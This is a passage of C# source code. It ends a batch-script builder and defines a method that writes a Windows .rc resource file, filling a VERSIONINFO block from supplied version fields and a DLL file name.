        sb.Append("echo === DONE ===\r\n");
        sb.Append("pause\r\n");
        return sb.ToString();
    }

    public static string GenerateRcFile(Dictionary<string, string> versionInfo, string dllName)
    {
        var fv = versionInfo.GetValueOrDefault("_file_version", "0,0,0,0");
        var pv = versionInfo.GetValueOrDefault("_product_version", "0,0,0,0");
        var fileOs = versionInfo.GetValueOrDefault("_file_os", "0x40004");
        var fileType = versionInfo.GetValueOrDefault("_file_type", "0x2");

        var stringEntries = new StringBuilder();
        foreach (var key in new[] { "CompanyName", "FileDescription", "FileVersion", "InternalName",
                                     "LegalCopyright", "OriginalFilename", "ProductName", "ProductVersion" })
        {
            var val = key switch
            {
                "OriginalFilename" => dllName,
                "InternalName" => Path.GetFileNameWithoutExtension(dllName),
                _ => versionInfo.GetValueOrDefault(key, "")
            };
            if (!string.IsNullOrEmpty(val))
            {
                var escaped = val.Replace("\\", "\\\\").Replace("\"", "\\\"");
                stringEntries.AppendLine($"            VALUE \"{key}\", \"{escaped}\"");
            }
        }

        return "#include <winver.h>\n\n"
             + "VS_VERSION_INFO VERSIONINFO\n"
             + $"FILEVERSION {fv}\n"
             + $"PRODUCTVERSION {pv}\n"
             + "FILEFLAGSMASK 0x3fL\nFILEFLAGS 0x0L\n"
             + $"FILEOS {fileOs}L\nFILETYPE {fileType}L\nFILESUBTYPE 0x0L\n"
             + "BEGIN\n    BLOCK \"StringFileInfo\"\n    BEGIN\n"
             + "        BLOCK \"040904B0\"\n        BEGIN\n"
             + stringEntries
             + "        END\n    END\n    BLOCK \"VarFileInfo\"\n    BEGIN\n"
             + "        VALUE \"Translation\", 0x0409, 0x04B0\n"
             + "    END\nEND\n";
    }
}
